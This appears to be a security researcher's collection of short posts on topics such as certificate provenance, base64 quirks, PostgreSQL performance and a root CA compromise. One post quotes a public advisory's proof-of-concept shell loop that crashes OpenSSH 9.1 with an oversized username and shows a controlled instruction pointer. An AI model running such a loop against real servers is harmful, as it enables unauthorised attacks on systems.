I love using Burp Pro for security testing, but it's also weirdly good at finding deeply-buried concurrency issues and race conditions.
This post by the Qualys Security Advisory team demonstrating rip/pc control on OpenSSH 9.1 (running on OpenBSD!) is savage: https://seclists.org/oss-sec/2023/q1/92
Here I was thinking this bug was hopeless and they one-line it without writing new code:
$ cp -i /usr/bin/ssh ./ssh
$ sed -i s/OpenSSH_9.1/FuTTYSH_9.1/g ./ssh
$ user=`perl -e 'print "A" x 300'` && while true ;do ./ssh -o NumberOfPasswordPrompts=0 -o Ciphers=aes128-ctr -l
"$user:$user" 192.168.56.123 ;done...
#1 0x4141414141414141 in ?? ()
A neat post by @foote & co at Fastly: A first look at Chrome's TLS ClientHello permutation in the wild https://www.fastly.com/blog/a-first-look-at-chromes-tls-clienthello-permutation-in-the-wild
#python #infosec #tlsToday’s fun turtle-chasing[0] moment was trying to understand how a python application validated TLS certificates. The application relies on the certifi package[1], which is built from the python-certifi github repository[2]. Both of these describe the source of this data as Mozilla, but they actually call an endpoint on the https://mkcert.org service hosted on Digital Ocean[3], which is built from the Lukasa/mkcert github repository[4]. The mkcert repository uses a Mercurial repository URL hosted by Mozilla[5]. This is fed by Mozilla’s CA inclusion process[6].
Even ignoring the Mozilla CA process, the number of people and companies involved in bringing a static PEM file into your python application is mind-boggling.
0. https://en.wikipedia.org/wiki/Turtles_all_the_way_down
1. https://pypi.org/project/certifi/
2. https://github.com/certifi/python-certifi/blob/master/Makefile
4. https://github.com/Lukasa/mkcert
5. https://hg.mozilla.org/mozilla-central/raw-file/tip/security/nss/lib/ckfw/builtins/certdata.txt
6. https://wiki.mozilla.org/CA/Included_Certificates
The unintentional irony of the mkcert.org landing page is 😘
Profound boredom is the root of all innovation. This paper covers it well, but every substantive project I worked on started offline with limited technical resources and lots of time to kill (metasploit, recog, runzero): https://www.bath.ac.uk/announcements/social-media-may-prevent-users-from-reaping-creative-rewards-of-profound-boredom-new-research/
Offline doesn't mean no computing, just lack of boredom-driven-page-reloading. So erm, if you are seeing this, drop into offline mode, find a park, and fidget until you find something all-engrossing to sink your time into.
Hi folks. Want to stop hearing about the bird site? Stop visiting it, stop linking to it, stop driving engagement, mute keywords, temporarily mute folks whinging about it. Just like the other commercial "social" networks, they thrive on misery and conflict, not community. Stop feeding it. It won't kill it, but your circle may stop talking about it.
Every few years I seem to forget that slightly different base64 strings can decode to the same bytes, even after excluding whitespace and the = padding.
For example, 0xd5 is the decoded result for 1a=, 1b=, 1c=, 1d=, 1e=, and 1f= -- it makes total sense given the encoding algorithm, but sometimes throws a curveball into testing, especially if you assume different inputs are always going to lead to different outputs.
I chased a "broken" test for an hour tonight before it clicked again. Happy Friday!
Tobias Petry's free (e)book "Next-Level Database Techniques For Developers" is eerily spot on - he addresses almost all of the painful and confusing bits I have bashed my head into while launching and scaling runZero. Recommended reading for any developer that touches PostgreSQL (or MySQL): https://sqlfordevs.com/ebook
There are many advantages to using a vendor-managed PostgreSQL (AWS Aurora), but the black box nature of diagnostics is not one of them. For anyone else fighting with index performance going suddenly sideways (10x slower queries) on Aurora PostgreSQL - the root cause seems to be that new reader replicas can sometimes have horrible index performance, but this only shows up when there are tons of concurrent requests, and running a full `reindex database concurrently <db>` resolves it. All of the standard diagnostics (looking for invalid indexes, trying manual queries on each endpoint with explain, checking seq scan stats, etc) pointed to everything being just fine.
Unrelated, but hilarious, it seems like that somebody is uploading sketchy AWS database snapshots and marking them public. Is this just a troll, or can a backdoored snapshot do anything interesting if you load it into a sensitive environment? (via extensions, triggers, etc).
In which Ian Carroll casually compromises a Turkish root CA trusted by most browsers: https://ian.sh/etugra
Copyright 1998-2025 HD Moore